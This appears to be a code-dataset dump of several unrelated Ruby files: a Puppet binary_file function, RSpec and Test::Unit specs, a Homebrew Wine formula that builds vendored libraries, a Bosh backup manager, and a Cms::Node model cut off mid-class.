1a4eb9e8b0fe77ab01e043487f89dbf4c4f1af44 | 1,315 | # Loads a binary file from a module or file system and returns its contents as a `Binary`.
# The argument to this function should be a `<MODULE NAME>/<FILE>`
# reference, which will load `<FILE>` from a module's `files`
# directory. (For example, the reference `mysql/mysqltuner.pl` will load the
# file `<MODULES DIRECTORY>/mysql/files/mysqltuner.pl`.)
#
# This function also accepts an absolute file path that allows reading
# binary file content from anywhere on disk.
#
# An error is raised if the given file does not exist.
#
# To search for the existence of files, use the `find_file()` function.
#
# - since 4.8.0
#
# @since 4.8.0
#
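# @example Loading a module file into a Binary (illustrative)
#   $mysqltuner = binary_file('mysql/mysqltuner.pl')
#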
Puppet::Functions.create_function(:binary_file, Puppet::Functions::InternalFunction) do
dispatch :binary_file do
scope_param
param 'String', :path
end
def binary_file(scope, unresolved_path)
path = Puppet::Parser::Files.find_file(unresolved_path, scope.compiler.environment)
unless path && Puppet::FileSystem.exist?(path)
#TRANSLATORS the string "binary_file()" should not be translated
raise Puppet::ParseError, _("binary_file(): The given file '%{unresolved_path}' does not exist") % { unresolved_path: unresolved_path }
end
Puppet::Pops::Types::PBinaryType::Binary.from_binary_string(Puppet::FileSystem.binread(path))
end
end
| 39.848485 | 141 | 0.735361 |
1ae7344ed2be94f9fd93e5cbc90b444e1b1c617b | 315 | require 'rails_helper'
RSpec.describe Water, type: :model do
describe 'associations' do
it { should belong_to(:user) }
end
describe 'validations' do
it { should validate_presence_of(:amount) }
it { should validate_presence_of(:user_id) }
it { should validate_presence_of(:total) }
end
end
| 22.5 | 48 | 0.707937 |
b9904eb446b55949235f01c6c78f19670d0805d8 | 5,542 | # frozen_string_literal: true
require 'spec_helper'
module Thredded
describe NotifyFollowingUsers do
describe '#targeted_users' do
subject(:targeted_users) { NotifyFollowingUsers.new(post).targeted_users(notifier) }
let(:post) { create(:post, user: poster, postable: topic) }
let(:poster) { create(:user, name: 'poster') }
let!(:follower) { create(:user_topic_follow, user: create(:user, name: 'follower'), topic: topic).user }
let(:topic) { create(:topic, messageboard: messageboard) }
let!(:messageboard) { create(:messageboard) }
let(:notifier) { EmailNotifier.new }
before do
# Creating a post will trigger the NotifyFollowingUsers job, creating UserPostNotification records.
# Create the post and then delete all the created UserPostNotification records for testing.
post
Thredded::UserPostNotification.destroy_all
end
it 'includes followers where preference to receive these notifications' do
create(:notifications_for_followed_topics,
notifier_key: 'email',
user: follower,
enabled: true)
expect(targeted_users).to include(follower)
end
it 'excludes followers that have already been notified' do
expect(Thredded::UserPostNotification.create_from_post_and_user(post, follower)).to be_truthy
expect(targeted_users).not_to include(follower)
end
it "doesn't include the poster, even if they follow" do
expect(UserTopicFollow.find_by(user_id: poster.id, topic_id: topic.id)).not_to be_nil
expect(targeted_users).not_to include(poster)
end
context "when a follower's email notification is turned off" do
before do
create(:notifications_for_followed_topics,
notifier_key: 'email',
user: follower,
enabled: false)
end
it "doesn't include that user" do
expect(targeted_users).not_to include(follower)
end
context 'with the MockNotifier' do
let(:notifier) { MockNotifier.new }
it 'does include that user' do
expect(targeted_users).to include(follower)
end
end
end
context "when a follower's 'mock' notification is turned off (per messageboard)" do
before do
create(:messageboard_notifications_for_followed_topics,
notifier_key: 'mock',
messageboard: messageboard,
user: follower,
enabled: false)
end
context 'with the EmailNotifier' do
let(:notifier) { EmailNotifier.new }
it 'does includes that user' do
expect(targeted_users).to include(follower)
end
end
context 'with the MockNotifier' do
let(:notifier) { MockNotifier.new }
it "doesn't include that user" do
expect(targeted_users).not_to include(follower)
end
end
end
context "when a follower's 'mock' notification is turned off (overall)" do
before do
create(:notifications_for_followed_topics,
notifier_key: 'mock',
user: follower,
enabled: false)
end
context 'with the EmailNotifier' do
let(:notifier) { EmailNotifier.new }
it 'does includes that user' do
expect(targeted_users).to include(follower)
end
end
context 'with the MockNotifier' do
let(:notifier) { MockNotifier.new }
it "doesn't include that user" do
expect(targeted_users).not_to include(follower)
end
end
end
end
describe '#run' do
let(:post) { create(:post) }
let(:command) { NotifyFollowingUsers.new(post) }
let(:targeted_users) { [create(:user)] }
before { allow(command).to receive(:targeted_users).and_return(targeted_users) }
it 'sends email' do
expect { command.run }.to change { ActionMailer::Base.deliveries.count }
# see EmailNotifier spec for more detailed specs
end
context 'with the MockNotifier', thredded_reset: [:@notifiers] do
let(:mock_notifier) { MockNotifier.new }
before { Thredded.notifiers = [mock_notifier] }
it "doesn't send any emails" do
expect { command.run }.not_to change { ActionMailer::Base.deliveries.count }
end
it 'notifies exactly once' do
expect { command.run }.to change(mock_notifier, :users_notified_of_new_post)
expect { command.run }.not_to change(mock_notifier, :users_notified_of_new_post)
end
end
context 'with multiple notifiers', thredded_reset: [:@notifiers] do
let(:mock_notifier1) { MockNotifier.new }
let(:mock_notifier2) { MockNotifier.new }
before { Thredded.notifiers = [mock_notifier1, mock_notifier2] }
def count_users_for_each_notifier
[mock_notifier1.users_notified_of_new_post.length, mock_notifier2.users_notified_of_new_post.length]
end
it 'notifies via all notifiers' do
expect { command.run }
.to change { count_users_for_each_notifier }.from([0, 0]).to([1, 1])
end
it "second run doesn't notify" do
command.run
expect { command.run }
.not_to change { count_users_for_each_notifier }
end
end
end
end
end
| 33.587879 | 110 | 0.624323 |
1ca2c0fa1cc63b7cf0a9556bf56840cb56500c1d | 8,067 | # frozen_string_literal: true
require 'appium_lib'
require_relative '../test_helper'
require_relative '../../lib/maze/capabilities'
require_relative '../../lib/maze/driver/appium'
require_relative '../../lib/maze/driver/resilient_appium'
require_relative '../../lib/maze/hooks/appium_hooks'
class AppiumHooksTest < Test::Unit::TestCase
def setup
$logger = mock('logger')
$config = mock('config')
Maze.stubs(:config).returns($config)
end
def test_device_capabilities_bs
$config.expects(:farm).returns(:bs)
$config.expects(:device).returns(:device)
$config.expects(:appium_version).returns(:appium_version)
$config.expects(:capabilities_option).returns(:capabilities_option)
$config.expects(:app).returns(:app)
caps_base = {}
Maze::Capabilities.expects(:for_browser_stack_device).with(
:device,
:tunnel_id,
:appium_version,
:capabilities_option
).returns(caps_base)
hooks = Maze::Hooks::AppiumHooks.new
caps = hooks.device_capabilities($config, :tunnel_id)
assert_equal(caps, caps_base)
assert_equal(:app, caps['app'])
end
def test_device_capabilities_local
$config.expects(:farm).returns(:local)
$config.expects(:os).returns(:os)
$config.expects(:capabilities_option).returns(:capabilities_option)
$config.expects(:apple_team_id).returns(:apple_team_id)
$config.expects(:device_id).returns(:device_id)
$config.expects(:app).returns(:app)
caps_base = {}
Maze::Capabilities.expects(:for_local).with(
:os,
:capabilities_option,
:apple_team_id,
:device_id
).returns(caps_base)
hooks = Maze::Hooks::AppiumHooks.new
caps = hooks.device_capabilities($config)
assert_equal(caps, caps_base)
assert_equal(:app, caps['app'])
end
def test_create_driver_resilient
$config.expects(:resilient).returns(true)
$config.expects(:appium_server_url).returns(:appium_server_url)
$config.expects(:capabilities).returns(:capabilities)
$config.expects(:locator).returns(:locator)
$logger.expects(:info).with('Creating ResilientAppium driver instance')
Maze::Driver::ResilientAppium.expects(:new).with(
:appium_server_url,
:capabilities,
:locator
).returns(:driver)
hooks = Maze::Hooks::AppiumHooks.new
driver = hooks.create_driver($config)
assert_equal(:driver, driver)
end
def test_create_driver_default
$config.expects(:resilient).returns(false)
$config.expects(:appium_server_url).returns(:appium_server_url)
$config.expects(:capabilities).returns(:capabilities)
$config.expects(:locator).returns(:locator)
$logger.expects(:info).with('Creating Appium driver instance')
Maze::Driver::Appium.expects(:new).with(
:appium_server_url,
:capabilities,
:locator
).returns(:driver)
hooks = Maze::Hooks::AppiumHooks.new
driver = hooks.create_driver($config)
assert_equal(:driver, driver)
end
def test_start_driver_success
driver_mock = mock('driver')
driver_mock.expects(:start_driver)
Maze.expects(:driver).twice.returns(false, true)
Maze.expects(:driver=).with(driver_mock)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).with($config, nil).returns(:caps)
hooks.expects(:create_driver).with($config).returns(driver_mock)
$config.expects(:capabilities=).with(:caps)
$config.expects(:appium_session_isolation).returns(false)
hooks.start_driver($config)
end
def test_start_driver_fails_once
driver_mock = mock('driver')
driver_mock.expects(:start_driver).raises(Selenium::WebDriver::Error::UnknownError)
Maze.expects(:driver).returns(false)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).with($config, nil).returns(:caps)
hooks.expects(:create_driver).with($config).returns(driver_mock)
$config.expects(:capabilities=).with(:caps)
$config.expects(:appium_session_isolation).returns(false)
$config.expects(:device).returns(:device)
$config.expects(:farm).returns(:farm)
$config.expects(:device_list).returns([])
$logger.expects(:warn).with("Attempt to acquire #{:device} device from farm #{:farm} failed")
$logger.expects(:warn).with("Exception: #{Selenium::WebDriver::Error::UnknownError.new.message}")
$logger.expects(:error).with('No further devices to try - raising original exception')
assert_raise Selenium::WebDriver::Error::UnknownError do
hooks.start_driver($config)
end
end
def test_start_driver_fails_then_succeeds
driver_mock = mock('driver')
driver_mock.expects(:start_driver).twice.raises(Selenium::WebDriver::Error::UnknownError).then.returns(true)
Maze.expects(:driver).times(3).returns(false, false, true)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).twice.with($config, nil).returns(:caps)
hooks.expects(:create_driver).twice.with($config).returns(driver_mock)
$config.expects(:capabilities=).twice.with(:caps)
$config.expects(:appium_session_isolation).twice.returns(false)
$config.expects(:device).twice.returns(:device)
$config.expects(:farm).returns(:farm)
device_list = mock('device_list')
$config.stubs(:device_list).returns(device_list)
$config.expects(:device_list=).with(device_list)
$config.expects(:device=).with(:next_device)
device_list.expects(:empty?).returns(false)
device_list.expects(:first).returns(:next_device)
device_list.expects(:drop).with(1).returns(device_list)
$logger.expects(:warn).with("Attempt to acquire #{:device} device from farm #{:farm} failed")
$logger.expects(:warn).with("Exception: #{Selenium::WebDriver::Error::UnknownError.new.message}")
$logger.expects(:warn).with("Retrying driver initialisation using next device: #{:device}")
Maze.expects(:driver=).with(driver_mock)
hooks.start_driver($config)
end
def test_start_driver_fails_multiple_times
driver_mock = mock('driver')
driver_mock.expects(:start_driver).times(3).raises(Selenium::WebDriver::Error::UnknownError)
Maze.expects(:driver).times(3).returns(false, false, false)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).times(3).with($config, nil).returns(:caps)
hooks.expects(:create_driver).times(3).with($config).returns(driver_mock)
$config.expects(:capabilities=).times(3).with(:caps)
$config.expects(:appium_session_isolation).times(3).returns(false)
$config.expects(:device).times(5).returns(:device)
$config.expects(:farm).times(3).returns(:farm)
device_list = mock('device_list')
$config.stubs(:device_list).returns(device_list)
$config.expects(:device_list=).twice.with(device_list)
$config.expects(:device=).twice.with(:next_device)
device_list.expects(:empty?).times(3).returns(false, false, true)
device_list.expects(:first).twice.returns(:next_device)
device_list.expects(:drop).with(1).twice.returns(device_list)
$logger.expects(:warn).times(3).with("Attempt to acquire #{:device} device from farm #{:farm} failed")
$logger.expects(:warn).times(3).with("Exception: #{Selenium::WebDriver::Error::UnknownError.new.message}")
$logger.expects(:warn).twice.with("Retrying driver initialisation using next device: #{:device}")
$logger.expects(:error).with('No further devices to try - raising original exception')
assert_raise Selenium::WebDriver::Error::UnknownError do
hooks.start_driver($config)
end
end
def test_start_driver_session_isolation
driver_mock = mock('driver')
Maze.expects(:driver).twice.returns(false, true)
Maze.expects(:driver=).with(driver_mock)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).with($config, nil).returns(:caps)
hooks.expects(:create_driver).with($config).returns(driver_mock)
$config.expects(:capabilities=).with(:caps)
$config.expects(:appium_session_isolation).returns(true)
hooks.start_driver($config)
end
end
| 36.174888 | 112 | 0.719598 |
1de3180473f05d6bf0b911ccfbd83e14f96b6ee7 | 20,341 | # NOTE: When updating Wine, please make sure to match Wine-Gecko and Wine-Mono
# versions:
# - https://wiki.winehq.org/Gecko
# - https://wiki.winehq.org/Mono
# with `GECKO_VERSION` and `MONO_VERSION`, as in:
# https://source.winehq.org/git/wine.git/blob/refs/tags/wine-3.0:/dlls/appwiz.cpl/addons.c
class Wine < Formula
desc "Run Windows applications without a copy of Microsoft Windows"
homepage "https://www.winehq.org/"
revision 1
stable do
url "https://dl.winehq.org/wine/source/3.0/wine-3.0.2.tar.xz"
mirror "https://downloads.sourceforge.net/project/wine/Source/wine-3.0.2.tar.xz"
sha256 "cad771375409e24244eab252da044306158af8a8bea4432e7ca81c1dc6b463ff"
# Patch to fix screen-flickering issues. Still relevant on 3.0.
# https://bugs.winehq.org/show_bug.cgi?id=34166
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/74c2566/wine/2.14.patch"
sha256 "6907471d18996ada60cc0cbc8462a1698e90720c0882846dfbfb163e5d3899b8"
end
resource "mono" do
url "https://dl.winehq.org/wine/wine-mono/4.7.1/wine-mono-4.7.1.msi"
sha256 "2c8d5db7f833c3413b2519991f5af1f433d59a927564ec6f38a3f1f8b2c629aa"
end
end
bottle do
rebuild 1
sha256 "8f214b6291164461664d6b48af8db303a94293ee85ce6de9eb8d4b3d959a5775" => :high_sierra_or_later
sha256 "682e3be7ce2094501b00bb8835fd7fd6c72273554aa22ad2de8d21a522aeed26" => :sierra
sha256 "8263513cedd9086122996f4233ff3449bbe2b0c8e759392843cc18d83a44f070" => :el_capitan
end
devel do
url "https://dl.winehq.org/wine/source/3.x/wine-3.17.tar.xz"
mirror "https://downloads.sourceforge.net/project/wine/Source/wine-3.17.tar.xz"
sha256 "4cede2e1de426af2430abee84afd77379a1f4f05c3ec9cd4280110de54fccc21"
resource "mono" do
url "https://dl.winehq.org/wine/wine-mono/4.7.1/wine-mono-4.7.1.msi"
sha256 "2c8d5db7f833c3413b2519991f5af1f433d59a927564ec6f38a3f1f8b2c629aa"
end
# Does not build with Xcode 10, used on High Sierra and Mojave
depends_on MaximumMacOSRequirement => :sierra
end
head do
url "https://source.winehq.org/git/wine.git"
resource "mono" do
url "https://dl.winehq.org/wine/wine-mono/4.7.1/wine-mono-4.7.1.msi"
sha256 "2c8d5db7f833c3413b2519991f5af1f433d59a927564ec6f38a3f1f8b2c629aa"
end
# Does not build with Xcode 10, used on High Sierra and Mojave
depends_on MaximumMacOSRequirement => :sierra
end
depends_on "cmake" => :build
depends_on "makedepend" => :build
depends_on "pkg-config" => :build
depends_on :macos => :el_capitan
fails_with :clang do
build 425
cause "Clang prior to Xcode 5 miscompiles some parts of wine"
end
resource "gecko-x86" do
url "https://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi"
sha256 "3b8a361f5d63952d21caafd74e849a774994822fb96c5922b01d554f1677643a"
end
resource "gecko-x86_64" do
url "https://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi"
sha256 "c565ea25e50ea953937d4ab01299e4306da4a556946327d253ea9b28357e4a7d"
end
resource "openssl" do
url "https://www.openssl.org/source/openssl-1.0.2p.tar.gz"
mirror "https://dl.bintray.com/homebrew/mirror/openssl--1.0.2p.tar.gz"
sha256 "50a98e07b1a89eb8f6a99477f262df71c6fa7bef77df4dc83025a2845c827d00"
end
resource "libtool" do
url "https://ftp.gnu.org/gnu/libtool/libtool-2.4.6.tar.xz"
mirror "https://ftpmirror.gnu.org/libtool/libtool-2.4.6.tar.xz"
sha256 "7c87a8c2c8c0fc9cd5019e402bed4292462d00a718a7cd5f11218153bf28b26f"
end
resource "jpeg" do
url "https://www.ijg.org/files/jpegsrc.v9c.tar.gz"
mirror "https://fossies.org/linux/misc/jpegsrc.v9c.tar.gz"
sha256 "650250979303a649e21f87b5ccd02672af1ea6954b911342ea491f351ceb7122"
end
resource "libtiff" do
url "https://download.osgeo.org/libtiff/tiff-4.0.9.tar.gz"
mirror "https://fossies.org/linux/misc/tiff-4.0.9.tar.gz"
sha256 "6e7bdeec2c310734e734d19aae3a71ebe37a4d842e0e23dbb1b8921c0026cfcd"
# All of these have been reported upstream & should
# be fixed in the next release, but please check.
patch do
url "https://mirrors.ocf.berkeley.edu/debian/pool/main/t/tiff/tiff_4.0.9-6.debian.tar.xz"
mirror "https://mirrorservice.org/sites/ftp.debian.org/debian/pool/main/t/tiff/tiff_4.0.9-6.debian.tar.xz"
sha256 "4e145dcde596e0c406a9f482680f9ddd09bed61a0dc6d3ac7e4c77c8ae2dd383"
apply "patches/CVE-2017-9935.patch",
"patches/CVE-2017-18013.patch",
"patches/CVE-2018-5784.patch",
"patches/CVE-2017-11613_part1.patch",
"patches/CVE-2017-11613_part2.patch",
"patches/CVE-2018-7456.patch",
"patches/CVE-2017-17095.patch",
"patches/CVE-2018-8905.patch",
"patches/CVE-2018-10963.patch"
end
end
resource "little-cms2" do
url "https://downloads.sourceforge.net/project/lcms/lcms/2.9/lcms2-2.9.tar.gz"
mirror "https://mirrors.kernel.org/debian/pool/main/l/lcms2/lcms2_2.9.orig.tar.gz"
sha256 "48c6fdf98396fa245ed86e622028caf49b96fa22f3e5734f853f806fbc8e7d20"
end
resource "libpng" do
url "https://downloads.sourceforge.net/libpng/libpng-1.6.35.tar.xz"
mirror "https://sourceforge.mirrorservice.org/l/li/libpng/libpng16/1.6.35/libpng-1.6.35.tar.xz"
sha256 "23912ec8c9584917ed9b09c5023465d71709dce089be503c7867fec68a93bcd7"
end
resource "freetype" do
url "https://downloads.sourceforge.net/project/freetype/freetype2/2.9.1/freetype-2.9.1.tar.bz2"
mirror "https://download.savannah.gnu.org/releases/freetype/freetype-2.9.1.tar.bz2"
sha256 "db8d87ea720ea9d5edc5388fc7a0497bb11ba9fe972245e0f7f4c7e8b1e1e84d"
end
resource "libusb" do
url "https://github.com/libusb/libusb/releases/download/v1.0.22/libusb-1.0.22.tar.bz2"
mirror "https://downloads.sourceforge.net/project/libusb/libusb-1.0/libusb-1.0.22/libusb-1.0.22.tar.bz2"
sha256 "75aeb9d59a4fdb800d329a545c2e6799f732362193b465ea198f2aa275518157"
end
resource "webp" do
url "https://storage.googleapis.com/downloads.webmproject.org/releases/webp/libwebp-1.0.0.tar.gz"
sha256 "84259c4388f18637af3c5a6361536d754a5394492f91be1abc2e981d4983225b"
end
resource "fontconfig" do
url "https://www.freedesktop.org/software/fontconfig/release/fontconfig-2.13.0.tar.bz2"
mirror "https://ftp.osuosl.org/pub/blfs/conglomeration/fontconfig/fontconfig-2.13.0.tar.bz2"
sha256 "91dde8492155b7f34bb95079e79be92f1df353fcc682c19be90762fd3e12eeb9"
end
resource "gd" do
url "https://github.com/libgd/libgd/releases/download/gd-2.2.5/libgd-2.2.5.tar.xz"
mirror "https://src.fedoraproject.org/repo/pkgs/gd/libgd-2.2.5.tar.xz/sha512/946675b0a9dbecdee3dda927d496a35d6b5b071d3252a82cd649db0d959a82fcc65ce067ec34d07eed0e0497cd92cc0d93803609a4854f42d284e950764044d0/libgd-2.2.5.tar.xz"
sha256 "8c302ccbf467faec732f0741a859eef4ecae22fea2d2ab87467be940842bde51"
end
resource "libgphoto2" do
url "https://downloads.sourceforge.net/project/gphoto/libgphoto/2.5.19/libgphoto2-2.5.19.tar.bz2"
sha256 "62523e52e3b8542301e072635b518387f2bd0948347775cf10cb2da9a6612c63"
end
resource "net-snmp" do
url "https://downloads.sourceforge.net/project/net-snmp/net-snmp/5.8/net-snmp-5.8.tar.gz"
sha256 "b2fc3500840ebe532734c4786b0da4ef0a5f67e51ef4c86b3345d697e4976adf"
end
resource "sane-backends" do
url "https://mirrors.kernel.org/debian/pool/main/s/sane-backends/sane-backends_1.0.27.orig.tar.gz"
mirror "https://fossies.org/linux/misc/sane-backends-1.0.27.tar.gz"
sha256 "293747bf37275c424ebb2c833f8588601a60b2f9653945d5a3194875355e36c9"
end
resource "mpg123" do
url "https://downloads.sourceforge.net/project/mpg123/mpg123/1.25.10/mpg123-1.25.10.tar.bz2"
mirror "https://www.mpg123.de/download/mpg123-1.25.10.tar.bz2"
sha256 "6c1337aee2e4bf993299851c70b7db11faec785303cfca3a5c3eb5f329ba7023"
end
def openssl_arch_args
{
:x86_64 => %w[darwin64-x86_64-cc enable-ec_nistp_64_gcc_128],
:i386 => %w[darwin-i386-cc],
}
end
# Store and restore some of our environment
def save_env
saved_cflags = ENV["CFLAGS"]
saved_ldflags = ENV["LDFLAGS"]
saved_homebrew_archflags = ENV["HOMEBREW_ARCHFLAGS"]
saved_homebrew_cccfg = ENV["HOMEBREW_CCCFG"]
saved_makeflags = ENV["MAKEFLAGS"]
saved_homebrew_optflags = ENV["HOMEBREW_OPTFLAGS"]
begin
yield
ensure
ENV["CFLAGS"] = saved_cflags
ENV["LDFLAGS"] = saved_ldflags
ENV["HOMEBREW_ARCHFLAGS"] = saved_homebrew_archflags
ENV["HOMEBREW_CCCFG"] = saved_homebrew_cccfg
ENV["MAKEFLAGS"] = saved_makeflags
ENV["HOMEBREW_OPTFLAGS"] = saved_homebrew_optflags
end
end
def install
# 32-bit support has been removed by Apple.
if DevelopmentTools.clang_build_version >= 1000
odie <<~EOS
Wine cannot currently be installed from source on
macOS #{MacOS.version}.
You may wish to try:
brew install wine --force-bottle
EOS
end
ENV.prepend_create_path "PATH", "#{libexec}/bin"
ENV.prepend_create_path "PKG_CONFIG_PATH", "#{libexec}/lib/pkgconfig"
resource("openssl").stage do
save_env do
ENV.deparallelize
ENV.permit_arch_flags
# OpenSSL will prefer the PERL environment variable if set over $PATH
# which can cause some odd edge cases & isn't intended. Unset for safety,
# along with perl modules in PERL5LIB.
ENV.delete("PERL")
ENV.delete("PERL5LIB")
archs = Hardware::CPU.universal_archs
dirs = []
archs.each do |arch|
dir = "build-#{arch}"
dirs << dir
mkdir_p "#{dir}/engines"
system "make", "clean"
system "perl", "./Configure", "--prefix=#{libexec}",
"no-ssl2",
"no-ssl3",
"no-zlib",
"shared",
"enable-cms",
*openssl_arch_args[arch]
system "make", "depend"
system "make"
cp "include/openssl/opensslconf.h", dir
cp Dir["*.?.?.?.dylib", "*.a", "apps/openssl"], dir
cp Dir["engines/**/*.dylib"], "#{dir}/engines"
end
system "make", "install"
%w[libcrypto libssl].each do |libname|
rm_f libexec/"lib/#{libname}.1.0.0.dylib"
MachO::Tools.merge_machos("#{libexec}/lib/#{libname}.1.0.0.dylib",
"#{dirs.first}/#{libname}.1.0.0.dylib",
"#{dirs.last}/#{libname}.1.0.0.dylib")
rm_f libexec/"lib/#{libname}.a"
end
Dir.glob("#{dirs.first}/engines/*.dylib") do |engine|
libname = File.basename(engine)
rm_f libexec/"lib/engines/#{libname}"
MachO::Tools.merge_machos("#{libexec}/lib/engines/#{libname}",
"#{dirs.first}/engines/#{libname}",
"#{dirs.last}/engines/#{libname}")
end
MachO::Tools.merge_machos("#{libexec}/bin/openssl",
"#{dirs.first}/openssl",
"#{dirs.last}/openssl")
confs = archs.map do |arch|
<<~EOS
#ifdef __#{arch}__
#{(Pathname.pwd/"build-#{arch}/opensslconf.h").read}
#endif
EOS
end
(libexec/"include/openssl/opensslconf.h").atomic_write confs.join("\n")
end
end
depflags = ["CPPFLAGS=-I#{libexec}/include", "LDFLAGS=-L#{libexec}/lib"]
# All other resources use ENV.universal_binary
save_env do
ENV.universal_binary
resource("libtool").stage do
ENV["SED"] = "sed" # prevent libtool from hardcoding sed path from superenv
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--program-prefix=g",
"--enable-ltdl-install"
system "make", "install"
end
resource("jpeg").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static"
system "make", "install"
end
resource("libtiff").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--disable-lzma",
"--without-x",
"--with-jpeg-lib-dir=#{libexec}/lib",
"--with-jpeg-include-dir=#{libexec}/include"
system "make", "install"
end
resource("little-cms2").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--with-jpeg=#{libexec}",
"--with-tiff=#{libexec}"
system "make", "install"
end
resource("libpng").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static"
system "make", "install"
end
resource("freetype").stage do
system "./configure", "--prefix=#{libexec}",
"--disable-static",
"--without-harfbuzz",
*depflags
system "make", "install"
end
resource("libusb").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static"
system "make", "install"
end
resource("webp").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--disable-gl",
"--enable-libwebpmux",
"--enable-libwebpdemux",
"--enable-libwebpdecoder",
*depflags
system "make", "install"
end
resource("fontconfig").stage do
# Remove for fontconfig > 2.13.0
# Upstream issue from 6 Mar 2018 "2.13.0 erroneously requires libuuid on macOS"
# See https://bugs.freedesktop.org/show_bug.cgi?id=105366
ENV["UUID_CFLAGS"] = " "
ENV["UUID_LIBS"] = " "
# Remove for fontconfig > 2.13.0
# Same effect as upstream commit from 10 Mar 2018 "Add uuid to
# Requires.private in .pc only when pkgconfig macro found it"
inreplace "configure",
'PKGCONFIG_REQUIRES_PRIVATELY="$PKGCONFIG_REQUIRES_PRIVATELY uuid"',
""
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--with-add-fonts=/System/Library/Fonts,/Library/Fonts,~/Library/Fonts",
"--localstatedir=#{var}/vendored_wine_fontconfig",
"--sysconfdir=#{prefix}",
*depflags
system "make", "install", "RUN_FC_CACHE_TEST=false"
end
resource("gd").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--without-x",
"--without-xpm",
"--with-png=#{libexec}",
"--with-fontconfig=#{libexec}",
"--with-freetype=#{libexec}",
"--with-jpeg=#{libexec}",
"--with-tiff=#{libexec}",
"--with-webp=#{libexec}"
system "make", "install"
end
resource("libgphoto2").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
*depflags
system "make", "install"
end
resource("net-snmp").stage do
# https://sourceforge.net/p/net-snmp/bugs/2504/
ln_s "darwin13.h", "include/net-snmp/system/darwin18.h"
system "./configure", "--disable-debugging",
"--prefix=#{libexec}",
"--disable-static",
"--enable-ipv6",
"--with-defaults",
"--with-persistent-directory=#{var}/db/net-snmp_vendored_wine",
"--with-logfile=#{var}/log/snmpd_vendored_wine.log",
"--with-mib-modules=host\ ucd-snmp/diskio",
"--without-rpm",
"--without-kmem-usage",
"--disable-embedded-perl",
"--without-perl-modules",
"--with-openssl=#{libexec}",
*depflags
system "make"
system "make", "install"
end
resource("sane-backends").stage do
save_env do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--localstatedir=#{var}",
"--without-gphoto2",
"--enable-local-backends",
"--with-usb=yes",
*depflags
# Remove for > 1.0.27
# Workaround for bug in Makefile.am described here:
# https://lists.alioth.debian.org/pipermail/sane-devel/2017-August/035576.html.
# Fixed in https://anonscm.debian.org/cgit/sane/sane-backends.git/commit/?id=519ff57
system "make"
system "make", "install"
end
end
resource("mpg123").stage do
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--prefix=#{libexec}",
"--with-default-audio=coreaudio",
"--with-module-suffix=.so",
"--with-cpu=generic"
system "make", "install"
end
end
# Help wine find our libraries at runtime
%w[freetype jpeg png sane tiff].each do |dep|
ENV["ac_cv_lib_soname_#{dep}"] = (libexec/"lib/lib#{dep}.dylib").realpath
end
mkdir "wine-64-build" do
system "../configure", "--prefix=#{prefix}",
"--enable-win64",
"--without-x",
*depflags
system "make", "install"
end
mkdir "wine-32-build" do
ENV.m32
system "../configure", "--prefix=#{prefix}",
"--with-wine64=../wine-64-build",
"--without-x",
*depflags
system "make", "install"
end
(pkgshare/"gecko").install resource("gecko-x86")
(pkgshare/"gecko").install resource("gecko-x86_64")
(pkgshare/"mono").install resource("mono")
end
def post_install
# For fontconfig
ohai "Regenerating font cache, this may take a while"
system "#{libexec}/bin/fc-cache", "-frv"
# For net-snmp
(var/"db/net-snmp_vendored_wine").mkpath
(var/"log").mkpath
end
def caveats; <<~EOS
You may also want winetricks:
brew install winetricks
EOS
end
test do
assert_equal shell_output("hostname").chomp, shell_output("#{bin}/wine hostname.exe 2>/dev/null").chomp
assert_equal shell_output("hostname").chomp, shell_output("#{bin}/wine64 hostname.exe 2>/dev/null").chomp
end
end
| 39.497087 | 229 | 0.582567 |
bf67aa21a0650d17ef79416d810f35bfac7224a4 | 338 | module Bosh::Director
module Api
class BackupManager
attr_accessor :destination_path
def initialize
@destination_path = '/var/vcap/store/director/backup.tgz'
end
def create_backup(user)
JobQueue.new.enqueue(user, Jobs::Backup, 'bosh backup', [destination_path])
end
end
end
end
| 21.125 | 83 | 0.66568 |
e8626b7f8fd9cf9a91bb2399fcf5eb8fc9b7e713 | 3,051 | class Cms::Node
include Cms::Model::Node
include Cms::PluginRepository
include Cms::Addon::NodeSetting
include Cms::Addon::EditorSetting
include Cms::Addon::GroupPermission
include Cms::Addon::NodeAutoPostSetting
include Cms::Addon::ForMemberNode
index({ site_id: 1, filename: 1 }, { unique: true })
class Base
include Cms::Model::Node
default_scope ->{ where(route: /^cms\//) }
end
class Node
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::EditorSetting
include Cms::Addon::NodeAutoPostSetting
include Cms::Addon::NodeList
include Cms::Addon::Form::Node
include Cms::Addon::ChildList
include Cms::Addon::ForMemberNode
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
default_scope ->{ where(route: "cms/node") }
end
class Page
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::EditorSetting
include Cms::Addon::NodeAutoPostSetting
include Event::Addon::PageList
include Cms::Addon::Form::Node
include Cms::Addon::Release
include Cms::Addon::DefaultReleasePlan
